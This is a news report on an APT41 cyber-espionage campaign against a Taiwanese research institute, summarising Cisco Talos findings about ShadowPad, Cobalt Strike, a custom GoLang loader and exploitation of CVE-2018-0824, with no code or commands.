A new cyber espionage campaign by the the China-linked state-sponsored threat actor tracked as APT41 has been observed targeting an unnamed Taiwanese government-affiliated research institute with the ShadowPad malware and the Cobalt Strike tool.
The breach, according to Cisco Talos, likely began as early as July 2023, with the attackers exploiting an outdated and vulnerable version of the Microsoft Office IME binary as a loader to deliver the customized second-stage loader, which subsequently launched the ShadowPad payload. In addition, APT41 developed a tailored loader to inject a proof-of-concept for the CVE-2018-0824 remote code execution vulnerability directly into memory to achieve local privilege escalation.
Cisco Talos said it detected unusual PowerShell commands that connected to an external IP address to download and execute PowerShell scripts within the compromised environment of the research institute, which specializes in computing and associated technologies.
ShadowPad, widely regarded as the successor to PlugX, is a modular remote access trojan (RAT) primarily used by Chinese hacking groups. It has been notably associated with APT41, a group believed to be based in Chengdu, China. ShadowPad has also been utilized by other Chinese hacking groups, such as Mustang Panda and the Tonto Team.
The most recent attack by the group involved a unique Cobalt Strike loader written in GoLang, designed to evade detection by Windows Defender. This loader, based on the anti-AV loader CS-Avoid-Killing hosted on GitHub, contains file and directory path strings in Simplified Chinese, suggesting the threat actors were proficient in the language. The repository is actively promoted in multiple Chinese hacking forums and technical tutorial articles.
Upon gaining access to the network, the attackers established a foothold by executing malicious code and binaries. They then installed a webshell to facilitate further discovery and execution activities. The threat actors also deployed additional malware, including ShadowPad and Cobalt Strike, using three different methods: through the installed webshell, via RDP access, and using a reverse shell.
During the compromise, the attackers attempted to exploit CVE-2018-0824 using a tool called UnmarshalPwn, a proof-of-concept for that exploits the flaw to achieve local privilege escalation.
